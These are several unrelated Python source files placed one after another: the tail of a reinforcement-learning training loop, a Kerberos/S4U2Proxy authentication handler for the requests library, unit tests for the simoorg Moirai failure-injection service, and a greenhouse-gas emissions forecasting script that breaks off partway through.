policy=self.policy, baseline=self.baseline, env=self.env, ) @overrides def train(self): self.start_worker() self.init_opt() for itr in range(self.current_itr, self.n_itr): with logger.prefix('itr #%d | ' % itr): paths_n = self.obtain_samples(itr) samples_data_n = self.process_samples(itr, paths_n) self.log_diagnostics(paths_n) # print('Average Return:', np.mean([sum(path["rewards"])for paths in paths_n for path in paths])) self.optimize_agents_policies(itr, samples_data_n) if itr and (itr % self.average_period == 0): self.optimize_policy() logger.log("saving snapshot...") params = self.get_itr_snapshot(itr) self.current_itr = itr + 1 params["algo"] = self logger.record_tabular('TransfBits',self.transferred_bits) # print([str(rew) + '*' + str(self.discount) + '^' + str(k) for k, rew in enumerate(paths_n[0][0]['rewards'])]) returns = [sum([rew*(self.discount**k) for k, rew in enumerate(path['rewards'])]) for paths in paths_n for path in paths] average_returns = np.mean(returns) # print(average_returns) # print(returns) logger.record_tabular('TotalAverageReturn', average_returns) logger.save_itr_params(itr, params) logger.log("saved") logger.dump_tabular(with_prefix=False) if (self.n_itr - 1) % self.average_period != 0 : self.optimize_policy() logger.log("saving snapshot...") params = self.get_itr_snapshot(self.n_itr - 1) params["algo"] = self logger.record_tabular('TransfBits',self.transferred_bits) average_returns = np.mean(np.array([path['returns'][0] for paths in paths_n for path in paths])) logger.record_tabular('TotalAverageReturn', np.mean(average_returns)) logger.save_itr_params(self.n_itr - 1, params) logger.log("saved") logger.dump_tabular(with_prefix=False) self.shutdown_worker() return np.mean([sum(path["rewards"])for paths in paths_n for path in paths])
<reponame>danderwald/s4u2p ''' Created on 22.05.2012 @author: norman ''' from requests.auth import AuthBase from requests.compat import urlparse from requests import get as reqget from requests import session import kerberos as k import s4u2p import re import logging def getLogger(): log = logging.getLogger("http_kerberos_auth_handler") handler = logging.StreamHandler() formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s') handler.setFormatter(formatter) log.addHandler(handler) return log log = getLogger() class HTTPKerberosAuth(AuthBase): """Attaches Kerberos Authentication to the given Request object.""" rx = re.compile('(?:.*,)*\s*Negotiate\s*([^,]*),?', re.I) auth_header = 'www-authenticate' def __init__(self, as_user=None, spn=None, gssflags=k.GSS_C_MUTUAL_FLAG|k.GSS_C_SEQUENCE_FLAG): self.retried = 0 self.context = None self.gssflags=gssflags self.spn = spn if as_user: self.gss_step = s4u2p.authGSSImpersonationStep self.gss_response = s4u2p.authGSSImpersonationResponse self.gss_clean = s4u2p.authGSSImpersonationClean self.gss_init = lambda *args: s4u2p.authGSSImpersonationInit(as_user, *args) self.GSSError = s4u2p.GSSError else: self.gss_step = k.authGSSClientStep self.gss_response = k.authGSSClientResponse self.gss_clean = k.authGSSClientClean self.gss_init = k.authGSSClientInit self.GSSError = k.GSSError def negotiate_value(self, headers): """checks for "Negotiate" in proper auth header """ authreq = headers.get(self.auth_header, None) if authreq: log.debug("authreq: %s", authreq) mo = self.rx.search(authreq) if mo: return mo.group(1) else: log.debug("regex failed on: %s" % authreq) else: log.debug("%s header not found" % self.auth_header) return None def get_spn(self, r): if self.spn is None: domain = urlparse(r.url).hostname self.spn = spn = "HTTP@%s" % domain log.debug("calculated SPN as %s" % spn) return self.spn def handle_401(self, r): """Takes the given response and tries kerberos negotiation, if needed.""" ret = r r.request.deregister_hook('response', self.handle_401) neg_value = self.negotiate_value(r.headers) #Check for auth_header firstround = False if neg_value is not None: if self.context is None: spn = self.get_spn(r) result, self.context = self.gss_init(spn, self.gssflags) if result < 1: log.warning("gss_init returned result %d" % result) return None firstround = False log.debug("gss_init() succeeded") result = self.gss_step(self.context, neg_value) if result < 0: self.gss_clean(self.context) self.context = None log.warning("gss_step returned result %d" % result) return None log.debug("gss_step() succeeded") if result == k.AUTH_GSS_CONTINUE or (result == k.AUTH_GSS_COMPLETE and not (self.gssflags & k.GSS_C_MUTUAL_FLAG) and firstround): response = self.gss_response(self.context) r.request.headers['Authorization'] = "Negotiate %s" % response r.request.send(anyway=True) _r = r.request.response _r.history.append(r) ret = _r if result == k.AUTH_GSS_COMPLETE and self.context: self.gss_clean(self.context) self.context = None return ret def __call__(self, r): r.register_hook('response', self.handle_401) return r def test(args): log.setLevel(logging.DEBUG) log.info("starting test") if args.keytab: s4u2p.authGSSKeytab(args.keytab) s = session(auth=HTTPKerberosAuth(as_user=args.user, spn=args.spn)) r=s.get(args.url) print r.text # if website is set up to keep auth, the next calls will not authenticate again # (in IIS accomplish this by setting the windowsAuthentication properties: authPersistNonNTLM="true" and authPersistSingleRequest="false") # for i in range(20): # r=s.get(args.url) # print i, r.text if __name__ == '__main__': import argparse parser = argparse.ArgumentParser(description="Kerberos authentication handler for the requests package.") parser.add_argument("--user", dest="user", help="user to impersonate, otherwise the current kerberos principal will be used", default=None) parser.add_argument("--url", dest="url", help="kerberos protected site") parser.add_argument("--spn", dest="spn", help="spn to use, if not given HTTP@domain will be used") parser.add_argument("--keytab", dest="keytab", help="path to keytab if you won't use system's default one (only needed for impersonation)", default=None) args = parser.parse_args() test(args)
# # Copyright 2015 LinkedIn Corp. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # import unittest import os import subprocess import shutil import simoorg.moirai as Moirai import simoorg.Api.ApiConstants as ApiConstants import json import time import yaml # Assuming a flat collection of tests MOIRAI_CONFIG_DIR = (os.path.dirname(os.path.realpath(__file__)) + "/unittest_configs/moirai_configs/") # Here we have three sets of configurations # A correct one - sample_base # An incorrect on (missing service name) - sample_incorrect # A configuration directory that is missing all the files - sample_missing CORRECT_FATEBOOK = "sample_base/" INCORRECT_FATEBOOK = "sample_incorrect/" MISSING_FATEBOOK = "sample_missing/" MISSING_API_CONFIGS = "sample_missing_api/" IMPOSSIBLE_API_CONFIGS = "sample_impossible_api/" COUNT_FATE = ['ps', 'aux'] TMP_FIFO = "/tmp/test.fifo" TEST_DIR = os.path.dirname(os.path.realpath(__file__)) DUMMY_HEALTHCHECK_SRC = (TEST_DIR + "/unittest_configs/dummy_healthcheck/" + "dummy.sh") DUMMY_HEALTHCHECK_DST = "/tmp/dummy.sh" class TestMoirai(unittest.TestCase): """ In this test set we want to test three different behavior of Moirai 1. When some required configs are missing 2. When some config is incorrect (missing service name in fatebook) 3. Correct behavior of moirai """ def setUp(self): try: shutil.copyfile(DUMMY_HEALTHCHECK_SRC, DUMMY_HEALTHCHECK_DST) os.chmod(DUMMY_HEALTHCHECK_DST, 0744) except: print ("Unable to write to file " + DUMMY_HEALTHCHECK_DST) raise def tearDown(self): os.remove(DUMMY_HEALTHCHECK_DST) try: self.moirai_fifo_fd.close() except: print ("Skipping moirai_fifo_fd close") def test_missing_configs(self): """ We expect moirai to raise an exception when fatebooks are missing """ moirai_obj = Moirai.Moirai(MOIRAI_CONFIG_DIR + MISSING_FATEBOOK) caught_exception_flag = False try: moirai_obj.spawn_atropos() except: caught_exception_flag = True if not caught_exception_flag: self.assert_(caught_exception_flag) def test_missing_api_configs(self): """ We expect moirai to raise an exception when api configs are missing """ caught_exception_flag = False try: moirai_obj = Moirai.Moirai(MOIRAI_CONFIG_DIR + MISSING_API_CONFIGS) moirai_obj.spawn_atropos() except IOError: caught_exception_flag = True if not caught_exception_flag: self.assert_(caught_exception_flag) def test_incorrect_configs(self): """ We expect moirai to raise an exception when fatebooks are missing service name """ moirai_obj = Moirai.Moirai(MOIRAI_CONFIG_DIR + INCORRECT_FATEBOOK) caught_exception_flag = False try: moirai_obj.spawn_atropos() except: caught_exception_flag = True if not caught_exception_flag: moirai_obj.finish() self.assert_(caught_exception_flag) def test_moirai(self): """ Test the correct behavior of Moirai """ moirai_obj = Moirai.Moirai(MOIRAI_CONFIG_DIR + CORRECT_FATEBOOK) moirai_obj.spawn_atropos() expected_army_size = len( os.listdir(MOIRAI_CONFIG_DIR + CORRECT_FATEBOOK + 'fate_books/')) # Check if the number of items in atropos army list is # same as the number of files in fate_books dir self.assertEqual(expected_army_size, len(moirai_obj.atropos_army)) # Next few checks, expects the atropos instance to be running # Hence for these checks to clear the runtime on the configs should # be atleast a few minutes for service, atropos_inst in moirai_obj.atropos_army.iteritems(): all_procs = subprocess.Popen(['ps', 'ax', ], stdout=subprocess.PIPE) all_pids = subprocess.Popen(['awk', '{print $1}'], stdin=all_procs.stdout, stdout=subprocess.PIPE) fate_procs = subprocess.Popen(['grep', str(atropos_inst.pid), ], stdin=all_pids.stdout, stdout=subprocess.PIPE) fate_count_command = subprocess.Popen(['wc', '-l', ], stdin=fate_procs.stdout, stdout=subprocess.PIPE) fate_count = int( fate_count_command.stdout.readline().strip()) self.assertEqual(fate_count, 1) # time.sleep(1) moirai_obj.finish() def execute_command(self, command, args, method='GET'): """ Send message to moirai """ try: self.moirai_fifo_fd = os.open( self.api_config['moirai_input_fifo'], os.O_WRONLY | os.O_NONBLOCK) self.moirai_fifo_file = os.fdopen(self.moirai_fifo_fd, 'w') except: self.moirai_fifo_fd = None return (-1, "Unable to connect to Moirai Service") self.command_id = self.command_id + 1 command_map = {ApiConstants.FIFO_ENDPOINT_KEY: self.api_fifo_path, ApiConstants.COMMAND_ID_KEY: self.command_id, ApiConstants.COMMAND_KEY: command, ApiConstants.ARGS_KEY: args, ApiConstants.METHOD_KEY: method} command_string = json.dumps(command_map) + '\n' try: self.moirai_fifo_file.write(command_string) self.moirai_fifo_file.flush() except IOError: op_msg = ("Unable to communicate with moirai") print ("LOG: " + op_msg) return (-1, op_msg) except OSError: self.moirai_fifo_fd = None op_msg = ("Unable to communicate with moirai") print ("LOG: " + op_msg) return (-1, op_msg) # Read from api fifo start_time = time.time() output_string = '' while output_string == '': try: output_string = self.api_fifo_file.read() except IOError: pass current_time = time.time() if current_time - start_time > ApiConstants.READ_TIMEOUT_SECS: op_msg = ("No message recieved from Moirai") print ("LOG: " + op_msg) return (-1, op_msg) try: output_obj = json.loads(output_string) except ValueError: op_msg = ("Recieved object is not a json object") print ("LOG: " + op_msg) return (-1, op_msg) if (output_obj[ApiConstants.COMMAND_ID_KEY] != self.command_id): op_msg = ("Recieved output with incorrect command id") print ("LOG: " + op_msg) return (-1, op_msg) return (0, output_obj[ApiConstants.COMMAND_OUTPUT_KEY]) def execute_incorrect_command(self): """ Send message to moirai """ try: self.moirai_fifo_fd = os.open( self.api_config['moirai_input_fifo'], os.O_WRONLY | os.O_NONBLOCK) self.moirai_fifo_file = os.fdopen(self.moirai_fifo_fd, 'w') except: self.moirai_fifo_fd = None return (-2, "Unable to connect to Moirai Service") self.command_id = self.command_id + 1 command_string = "NOT A JSON STRING" try: self.moirai_fifo_file.write(command_string) self.moirai_fifo_file.flush() except IOError: op_msg = ("Unable to communicate with moirai") print ("LOG: " + op_msg) return (-2, op_msg) except OSError: self.moirai_fifo_fd = None op_msg = ("Unable to communicate with moirai") print ("LOG: " + op_msg) return (-2, op_msg) NEW_READ_TIMEOUT_SECS = 20 # Read from api fifo start_time = time.time() output_string = '' while output_string == '': try: output_string = self.api_fifo_file.read() except IOError: pass current_time = time.time() if current_time - start_time > NEW_READ_TIMEOUT_SECS: op_msg = ("No message recieved from Moirai") print ("LOG: " + op_msg) return (-1) return 0 def test_impossible_moiriai_fifo(self): """ Looks at the behaviour of moirai when an impossible path is provided to ti """ moirai_obj = Moirai.Moirai(MOIRAI_CONFIG_DIR + IMPOSSIBLE_API_CONFIGS) moirai_obj.spawn_atropos() time.sleep(1) self.assert_(not moirai_obj.api_read_procs[0].is_alive()) moirai_obj.finish() def test_moirai_api_commands(self): """ Test the api hooks for moirai """ moirai_obj = Moirai.Moirai(MOIRAI_CONFIG_DIR + CORRECT_FATEBOOK) moirai_obj.spawn_atropos() expected_list_op = ['test_service'] failure_list = ['test_failure'] server_list = ['localhost'] self.command_id = 0 event_list_cnt = 4 try: os.mkfifo(TMP_FIFO) except (IOError, OSError): print ("the temp fifo file already exists, moving along") self.api_fifo_path = TMP_FIFO with open(MOIRAI_CONFIG_DIR + CORRECT_FATEBOOK + '/api.yaml') \ as conf_fd: self.api_config = yaml.load(conf_fd) try: api_fifo_fd = os.open(TMP_FIFO, os.O_NONBLOCK) self.api_fifo_file = os.fdopen(api_fifo_fd) except (IOError, OSError): self.assert_(False) # Test the list command status, output = self.execute_command('list', {}) if status == -1: self.assert_(False) self.assertEqual(json.loads(output), expected_list_op) # check plan status, output = self.execute_command('plan', {'service_name': 'test_service'}) if status == -1: self.assert_(False) output_list = json.loads(output) for event in output_list: for failure, trigger_time in event.iteritems(): try: time_stmp = int(trigger_time) if time_stmp <= 0: self.assert_(False) except: self.assert_(False) if failure not in failure_list: self.assert_(False) # check servers status, output = self.execute_command('servers', {'service_name': 'test_service'}) if status == -1: self.assert_(False) print (output) output_list = json.loads(output) for server in output_list: if server not in server_list: self.assert_(False) # check events status, output = self.execute_command('events', {'service_name': 'test_service'}) if status == -1: self.assert_(False) output_list = json.loads(output) for event in output_list: self.assertEqual(len(event), event_list_cnt) moirai_obj.finish() # check unknown commands status, output = self.execute_command('dummy', {'service_name': 'test_service'}) if status == -1: self.assert_(False) # check incorrect message status = self.execute_incorrect_command() print status if status != -1: self.assert_(False) if __name__ == '__main__': unittest.main()
<gh_stars>0 # This script uses an AR1 autoregressive model to forecast aggregated subsector level emissions of GHG in the US # Importing required modules import numpy as np import pandas as pd import statsmodels.api as stats import matplotlib.pyplot as plt from scipy.stats import norm # Declaring filepaths for data files arpath = 'C:/Users/User/Documents/Data/state_level_ardata.csv' epapath = 'C:/Users/User/Documents/Data/EPAGHGdata.csv' gdp_filepath = 'C:/Users/User/Documents/Data/gdp_reg_data.csv' ratiopath = 'C:/Users/User/Documents/Data/ghg_ratio_data.csv' # Structuring the dataframes for regression data = pd.read_csv(arpath) state_dummies = pd.get_dummies(data['State']) Y_Energy = data['Energy_Delta'] Y_Commercial = data['Commercial_Delta'] Y_Residential = data['Residential_Delta'] Y_Industrial = data['Industrial_Delta'] Y_Transportation = data['Transportation_Delta'] Y_Electric_Power = data['Electric_Power_Delta'] Y_Fugitive = data['Fugitive_Delta'] X_Energy = data[['GDP_per_capita', 'Population_Density', 'Renewables', 'HDD', 'CDD']] X_Commercial = data[['GDP_per_capita', 'Population_Density', 'Renewables', 'HDD', 'CDD']] X_Residential = data[['GDP_per_capita', 'Population_Density', 'Renewables', 'HDD', 'CDD']] X_Industrial = data[['GDP_per_capita', 'Population_Density', 'Renewables', 'HDD', 'CDD']] X_Transportation = data[['GDP_per_capita', 'Population_Density', 'Renewables', 'HDD', 'CDD']] X_Electric_Power = data[['GDP_per_capita', 'Population_Density', 'Renewables', 'HDD', 'CDD']] X_Fugitive = data[['GDP_per_capita', 'Population_Density', 'Renewables', 'HDD', 'CDD']] # Running AR-1 regression models with EKC Hypothesis format # Emissions from energy energy_model = stats.OLS(Y_Energy.astype(float), X_Energy.astype(float)) energy_results = energy_model.fit() print(energy_results.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/energy_model.txt', 'w') file.write(energy_results.summary().as_text()) file.close() # Emissions from commercial commercial_model = stats.OLS(Y_Commercial.astype(float), X_Commercial.astype(float)) commercial_results = commercial_model.fit() print(commercial_results.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/commercial_model.txt', 'w') file.write(commercial_results.summary().as_text()) file.close() # Emissions from residential residential_model = stats.OLS(Y_Residential.astype(float), X_Residential.astype(float)) residential_results = residential_model.fit() print(residential_results.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/residential_model.txt', 'w') file.write(residential_results.summary().as_text()) file.close() # Emissions from industry industrial_model = stats.OLS(Y_Industrial.astype(float), X_Industrial.astype(float)) industrial_results = industrial_model.fit() print(industrial_results.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/industrial_model.txt', 'w') file.write(industrial_results.summary().as_text()) file.close() # Emissions from transportation transportation_model = stats.OLS(Y_Transportation.astype(float), X_Transportation.astype(float)) transportation_results = transportation_model.fit() print(transportation_results.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/transportation_model.txt', 'w') file.write(transportation_results.summary().as_text()) file.close() # Emissions from electric power electric_model = stats.OLS(Y_Electric_Power.astype(float), X_Electric_Power.astype(float)) electric_results = electric_model.fit() print(electric_results.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/electric_model.txt', 'w') file.write(electric_results.summary().as_text()) file.close() # Fugitive emissions in energy fugitive_model = stats.OLS(Y_Fugitive.astype(float), X_Fugitive.astype(float)) fugitive_results = fugitive_model.fit() print(fugitive_results.summary()) file = open('C:/Users/User/Documents/Data/Regression_Outputs/Linear/fugitive_model.txt', 'w') file.write(fugitive_results.summary().as_text()) file.close() # Forecasting Population Density # Generate list of states and obtain parameters for forecasts States = list(data.State.unique()) # Find time trend for population density pop_params = [[],[]] y = [i for i in range(21)] y = stats.add_constant(y) for state in States: pop_temp = [] for i in range(len(data)): if data.State[i] == state: pop_temp.append(data.Population_Density[i]) temp_pop_mod = stats.OLS(pop_temp, y) temp_pop_res = temp_pop_mod.fit() pop_params[0].append(temp_pop_res.params[0]) pop_params[1].append(temp_pop_res.params[1]) # Create dataframe with pandas to record trends d = {'State':States, 'PD_int':pop_params[0], 'PD_slope':pop_params[1]} params_df = pd.DataFrame(d) print(params_df) # Forecasting Fossil Fuel Usage # Find time trend for fossil fuel usage ff_params = [[],[]] for state in States: ff_temp = [] for i in range(len(data)): if data.State[i] == state: ff_temp.append(data.Renewables[i]) temp_ff_mod = stats.OLS(ff_temp, y) temp_ff_res = temp_ff_mod.fit() ff_params[0].append(temp_ff_res.params[0]) ff_params[1].append(temp_ff_res.params[1]) # Create dataframe with pandas to record trends dff = {'State':States, 'FF_int':ff_params[0], 'FF_slope':ff_params[1]} ffparams_df = pd.DataFrame(dff) print(ffparams_df) # Forecasting Heating Degree Days # Find time trend for HDD HDD_params = [[],[]] for state in States: HDD_temp = [] for i in range(len(data)): if data.State[i] == state: HDD_temp.append(data.HDD[i]) temp_HDD_mod = stats.OLS(HDD_temp, y) temp_HDD_res = temp_HDD_mod.fit() HDD_params[0].append(temp_HDD_res.params[0]) HDD_params[1].append(temp_HDD_res.params[1]) # Create dataframe with pandas to record trends HDD = {'State':States, 'HDD_int':HDD_params[0], 'HDD_slope':HDD_params[1]} HDDparams_df = pd.DataFrame(HDD) print(HDDparams_df) # Forecasting Cooling Degree Days # Find time trend for CDD CDD_params = [[],[]] for state in States: CDD_temp = [] for i in range(len(data)): if data.State[i] == state: CDD_temp.append(data.CDD[i]) temp_CDD_mod = stats.OLS(CDD_temp, y) temp_CDD_res = temp_CDD_mod.fit() CDD_params[0].append(temp_CDD_res.params[0]) CDD_params[1].append(temp_CDD_res.params[1]) # Create dataframe with pandas to record trends CDD = {'State':States, 'CDD_int':CDD_params[0], 'CDD_slope':CDD_params[1]} CDDparams_df = pd.DataFrame(CDD) print(CDDparams_df) # Forecast state level total GHG emissions # First estimate state level GDP growth rates via the following model # \ln{\left(\frac{y_{i,t}}{y_{i,t-1}}\right)} = \gamma_{0,t} + \gamma_{1}\ln{(y_{i,t-1})} + \gamma_{2}\ln{(y_{i,t-1}^{2})} + \theta_{i,t} # Create dataframe with all data needed for this regression gdp_data = pd.read_csv(gdp_filepath) gdp_params = [[],[],[]] for state in States: print(state) temp1 = [] temp2 = [] y = [] for i in range(len(gdp_data)): if gdp_data.State[i] == state: temp1.append(gdp_data.ln_GDP[i]) temp2.append(gdp_data.ln_GDP_2[i]) y.append(gdp_data.Y[i]) temp1 = pd.DataFrame(temp1) temp1.rename(columns = {0:'ln_GDP'}, inplace = True) temp2 = pd.DataFrame(temp2) temp2.rename(columns = {0:'ln_GDP_2'}, inplace = True) x = pd.concat([temp1, temp2], axis = 1) x = stats.add_constant(x) y = pd.DataFrame(y) y.rename(columns = {0:'Y'}, inplace = True) temp_gdp_mod = stats.OLS(y, x) temp_gdp_res = temp_gdp_mod.fit() print(temp_gdp_res.summary()) gdp_params[0].append(temp_gdp_res.params[0]) gdp_params[1].append(temp_gdp_res.params[1]) gdp_params[2].append(temp_gdp_res.params[2]) dgdp = {'State':States, 'gamma_0':gdp_params[0], 'gamma_1':gdp_params[1], 'gamma_2':gdp_params[2]} GDP_df = pd.DataFrame(dgdp) GDP_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/gdp_forecast.txt', index = False) # Unpack these ln-ratio estimates into actual forecasted data gdp_data2 = GDP_df gdp_forc = [] for state in States: fgdp = [] fgdp1 = [] fgdp2 = [] for i in range(len(data)): if data['State'][i] == state: fgdp.append(data.GDP_per_capita[i]) fgdp1.append(np.log(data.GDP_per_capita[i])) fgdp2.append(np.log(data.GDP_per_capita_2[i])) idx = gdp_data2[gdp_data2['State'] == state].index.values.astype(int)[0] for i in range(21,121): fgdp1.append((fgdp1[i-1] + gdp_data2['gamma_0'][idx] + gdp_data2['gamma_1'][idx]*fgdp1[i-1] + gdp_data2['gamma_2'][idx]*fgdp2[i-1])) fgdp.append(np.exp(fgdp1[i])) fgdp2.append(np.log(fgdp[i]**2)) gdp_forc.append(fgdp) gdpforcdic = {'State':States, 'forecasted_gdp_per_capita':gdp_forc} GDP_df = pd.DataFrame(gdpforcdic) GDP_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/gdp_forecast.txt', index = False) # Second estimate future population densities, fossil fuel usages, HDD, and CDD pop_den_forecast = [] ff_forecast = [] HDD_forecast = [] CDD_forecast = [] for state in States: idx = params_df[params_df['State'] == state].index.values.astype(int)[0] temp = [(params_df['PD_int'][idx] + params_df['PD_slope'][idx]*i) for i in range(22,122)] temp2 = [(ffparams_df['FF_int'][idx] + ffparams_df['FF_slope'][idx]*i) for i in range (22,122)] tempH = [(HDDparams_df['HDD_int'][idx] + HDDparams_df['HDD_slope'][idx]*i) for i in range (22,122)] tempC = [(CDDparams_df['CDD_int'][idx] + CDDparams_df['CDD_slope'][idx]*i) for i in range (22,122)] pop_den_forecast.append(temp) ff_forecast.append(temp2) HDD_forecast.append(tempH) CDD_forecast.append(tempC) pdforc = {'State':States, 'forecasted_PD':pop_den_forecast, 'forecasted_FF':ff_forecast, 'forecasted_HDD':HDD_forecast, 'forecasted_CDD':CDD_forecast} PD_df = pd.DataFrame(pdforc) PD_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/pd_ff_forecast.txt', index = False) # Third get raw estimates of state level forecasted emissions forecasted_energy_ghg = [] ar_usage = data.iloc[960::].set_index('State') beta = energy_results.params for state in States: temp = [] idx = GDP_df[GDP_df['State'] == state].index.values.astype(int)[0] lag_val = ar_usage.Energy[state] for i in range(6): try: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i] + beta[state])) lag_val = temp[len(temp)-1] except: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i])) lag_val = temp[len(temp)-1] forecasted_energy_ghg.append(temp) energy_forcdic = {'State':States, 'Forecasted_Energy_GHG':forecasted_energy_ghg} energy_forc_df = pd.DataFrame(energy_forcdic) print(energy_forc_df) energy_forc_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/ENERGY_GHG_FORECAST.txt', index = False) # Aggregating energy production derived GHG emissions for the US historical = np.zeros(21) US_energy_GHG = np.zeros(len(energy_forc_df['Forecasted_Energy_GHG'][0])) agg_energy = [] for state in States: temp = [] for i in range(len(data)): if data.State[i] == state: temp.append(data.Energy[i]) agg_energy.append(temp) for i in range(21): for j in range(len(agg_energy)): historical[i] += agg_energy[j][i] for i in range(len(energy_forc_df)): for j in range(len(energy_forc_df['Forecasted_Energy_GHG'][0])): US_energy_GHG[j] += energy_forc_df['Forecasted_Energy_GHG'][i][j] ratiodata = pd.read_csv(ratiopath) ratio_mean = np.mean(ratiodata.Ratio) US_energy_GHG = US_energy_GHG / ratio_mean # Fourth use calculated growth rates and population denisties to forecast emissions via following tobit model # \hat{m}_{i,t} = \Phi(\frac{\hat{m}_{i,t}}{\sigma})\ast\hat{m}_{i,t} + \hat{\sigma}\ast\phi(\hat{m}_{i,t}) # Find \sigma as the standard deviation of the residuals from each model residual_means = np.mean(energy_results.resid) residual_std = np.std(energy_results.resid) # Estimate the tobit transformed forecasts # Defining function for the tobit transformation def tobit_transform(x,s): out = x*norm.cdf(x/s) + s*norm.pdf(x) return out # Performing the tobit transformation on the data # Transforming the forecasts with the tobit transform for i in range(len(US_energy_GHG)): US_energy_GHG[i] = tobit_transform(US_energy_GHG[i], residual_std) # Create a scatter plot of historical aggregated US GHG emissions from energy production from pylab import rcParams rcParams['figure.figsize'] = 8.5, 8.5 cm = plt.get_cmap('gist_rainbow') plt.figure(0) basis = [i for i in range(1991,2012)] plt.plot(basis, historical, label = 'Historical Data') # Add titles plt.title('Historical Data', loc = 'center', fontsize = 12, fontweight = 40, color = 'black') plt.xlabel('Year') plt.ylabel('GHG Emissions in Mt CO2 Equivalent') # Save the figure plt.savefig('C:/Users/User/Documents/Data/Regression_Outputs/Linear/historical.eps') # Create scatter plots for forecasted aggreagated US GHG emissions from energy production plt.figure(1) basis = [i for i in range(2012,2018)] plt.plot(basis, US_energy_GHG, label = 'AR-1 EKC', color = cm(00)) # Add legend plt.legend(loc = 8, ncol = 2) # Add titles plt.title('Aggregated GHG Emissions from Energy Production', loc = 'center', fontsize = 12, fontweight = 40, color = 'black') plt.xlabel('Year') plt.ylabel('GHG Emissions in Mt CO2 Equivalent') # Save the figure plt.savefig('C:/Users/User/Documents/Data/Regression_Outputs/Linear/forecasts_all.eps') # State level plots plt.figure(2) for i in range(len(States)): plt.plot(basis, energy_forc_df['Forecasted_Energy_GHG'][i]) # Add titles and save plt.title('State-wise GHG Emissions from Energy Production', loc = 'center', fontsize = 12, fontweight = 40, color = 'black') plt.xlabel('Year') plt.ylabel('GHG Emissions in Mt CO2 Equivalent') plt.savefig('C:/Users/User/Documents/Data/Regression_Outputs/Linear/all_states_model.eps') # Do subsetor analyses to provide a more in depth analysis of energy production based GHG emissions # Get raw estimates of state level forecasted emissions for the following cases: forecasted_commercial_ghg = [] beta = commercial_results.params for state in States: temp = [] idx = GDP_df[GDP_df['State'] == state].index.values.astype(int)[0] lag_val = ar_usage.Commercial[state] for i in range(6): try: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i] + beta[state])) lag_val = temp[len(temp)-1] except: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i])) lag_val = temp[len(temp)-1] forecasted_commercial_ghg.append(temp) commercial_forcdic = {'State':States, 'Forecasted_commercial_GHG':forecasted_commercial_ghg} commercial_forc_df = pd.DataFrame(commercial_forcdic) print(commercial_forc_df) commercial_forc_df.to_csv('C:/Users/User/Documents/Data/Regression_Outputs/Linear/commercial_GHG_FORECAST.txt', index = False) # Aggregating commercial production derived GHG emissions for the US US_commercial_historical = np.zeros(21) US_commercial_GHG = np.zeros(len(commercial_forc_df['Forecasted_commercial_GHG'][0])) agg_commercial = [] for state in States: temp = [] for i in range(len(data)): if data.State[i] == state: temp.append(data.Commercial[i]) agg_commercial.append(temp) for i in range(21): for j in range(len(agg_commercial)): US_commercial_historical[i] += agg_commercial[j][i] for i in range(len(commercial_forc_df)): for j in range(len(commercial_forc_df['Forecasted_commercial_GHG'][0])): US_commercial_GHG[j] += commercial_forc_df['Forecasted_commercial_GHG'][i][j] # Fourth use calculated growth rates and population denisties to forecast emissions via following tobit model # \hat{m}_{i,t} = \Phi(\frac{\hat{m}_{i,t}}{\sigma})\ast\hat{m}_{i,t} + \hat{\sigma}\ast\phi(\hat{m}_{i,t}) # Find \sigma as the standard deviation of the residuals from each model residual_means = np.mean(commercial_results.resid) residual_std = np.std(commercial_results.resid) # Estimate the tobit transformed forecasts # Performing the tobit transformation on the data # Transforming the forecasts with the tobit transform for i in range(len(US_commercial_GHG)): US_commercial_GHG[i] = tobit_transform(US_commercial_GHG[i], residual_std) # Do subsetor analyses to provide a more in depth analysis of energy production based GHG emissions # Get raw estimates of state level forecasted emissions for the following cases: forecasted_residential_ghg = [] beta = residential_results.params for state in States: temp = [] idx = GDP_df[GDP_df['State'] == state].index.values.astype(int)[0] lag_val = ar_usage.Residential[state] for i in range(6): try: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i] + beta[state])) lag_val = temp[len(temp)-1] except: temp.append(max(0, lag_val + beta['GDP_per_capita']*GDP_df['forecasted_gdp_per_capita'][idx][i] + beta['Population_Density']*PD_df['forecasted_PD'][idx][i] + beta['Renewables']*PD_df['forecasted_FF'][idx][i])) lag_val = temp[len(temp)-1] forecasted_residential_ghg.append(temp) residential_forcdic = {'State':States, 'Forecasted_residential_GHG':forecasted_residential_ghg} residential_forc_df = pd.DataFrame(residential_forcdic) print(residential_forc_df) 